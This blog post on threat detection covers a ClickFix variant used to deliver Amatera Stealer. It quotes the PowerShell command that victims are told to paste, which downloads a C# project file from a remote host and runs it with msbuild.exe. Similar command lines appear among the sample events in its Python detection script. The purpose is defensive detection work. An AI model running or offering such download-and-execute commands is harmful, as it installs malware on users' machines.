172. Another Curious ClickFix PowerShell Command

Hello everyone!

I think everybody already knows about the ClickFix technique, but we still see new variations, especially in the command a victim is asked to paste.

Proofpoint has published a report on Amatera Stealer, and the adversary leveraged the ClickFix technique to deliver it. The victim is asked to paste the following command into the Windows Run dialog:

powershell -w h -c "$p=$env:TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -O $p;&($env:SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p"

The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and execute it using msbuild.exe.

So, as always, we can use suspicious command-line arguments for detection, for example:

event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: (*msbuild* AND *csproj*)
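To show how that rule behaves on telemetry, here is an added Python example. It is not code from the original post or from Proofpoint's report; it assumes the field names used in the query above (event_type, proc_file_name, cmdline), runs over a handful of constructed process-creation events, and uses the placeholder domain cv.example.invalid instead of the real download host. Besides the match itself, it pulls any download URL out of a matching command line and defangs it for reporting.

```python
import re

# Constructed sample process-creation events (not real telemetry). Field names
# follow the query in the post: event_type, proc_file_name, cmdline.
SAMPLE_EVENTS = [
    {   # ClickFix-style: PowerShell fetches a .csproj and hands it to msbuild.exe
        "event_type": "processcreatewin",
        "proc_file_name": "powershell.exe",
        "cmdline": ("powershell -w h -c \"$p=$env:TEMP+'\\t.csproj';"
                    "irm https://cv.example.invalid/t.csproj -O $p;"
                    "&($env:SystemRoot+'\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe') $p\""),
    },
    {   # Benign PowerShell, no msbuild or csproj
        "event_type": "processcreatewin",
        "proc_file_name": "powershell.exe",
        "cmdline": "powershell.exe -NoProfile -Command Get-Process",
    },
    {   # msbuild.exe started directly: proc_file_name is not powershell.exe, so no match
        "event_type": "processcreatewin",
        "proc_file_name": "msbuild.exe",
        "cmdline": "msbuild.exe C:\\src\\app\\app.csproj /t:Build",
    },
    {   # Same pattern in upper case: the match must be case-insensitive
        "event_type": "processcreatewin",
        "proc_file_name": "POWERSHELL.EXE",
        "cmdline": "POWERSHELL -C \"& MSBUILD.EXE C:\\USERS\\PUBLIC\\X.CSPROJ\"",
    },
    {   # A developer building a project from PowerShell: matches too (false positive)
        "event_type": "processcreatewin",
        "proc_file_name": "powershell.exe",
        "cmdline": "powershell -c \"msbuild .\\app.csproj /t:Build\"",
    },
]


def matches_rule(event):
    """Python equivalent of the post's query:
    event_type processcreatewin AND proc_file_name powershell.exe
    AND cmdline contains both 'msbuild' and 'csproj' (case-insensitive)."""
    if event.get("event_type", "").lower() != "processcreatewin":
        return False
    if event.get("proc_file_name", "").lower() != "powershell.exe":
        return False
    cmd = event.get("cmdline", "").lower()
    return "msbuild" in cmd and "csproj" in cmd


# http(s) URL up to the first whitespace, quote, angle bracket or semicolon
URL_RE = re.compile(r"""https?://[^\s'"<>;]+""", re.IGNORECASE)


def defang(url):
    """Defang scheme and host only (http -> hxxp, '.' -> '[.]'), keep the path."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def extract_indicators(cmdline):
    """Return the defanged download URLs found in a command line."""
    return [defang(u) for u in URL_RE.findall(cmdline)]


def hunt(events):
    """Return (event index, defanged URLs) for every event matching the rule."""
    hits = []
    for i, ev in enumerate(events):
        if matches_rule(ev):
            hits.append((i, extract_indicators(ev.get("cmdline", ""))))
    return hits


if __name__ == "__main__":
    for idx, urls in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['cmdline']}")
        for u in urls:
            print(f"  download URL: {u}")
```

Running it flags events 0, 3 and 4. The last one is the caveat: a developer invoking msbuild on a .csproj from a PowerShell session matches the same rule, so on hosts where .NET builds are normal you will want to baseline those invocations (or require the download part, e.g. an http(s) URL or a path under TEMP in the same command line) before alerting on every hit.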

See you tomorrow!
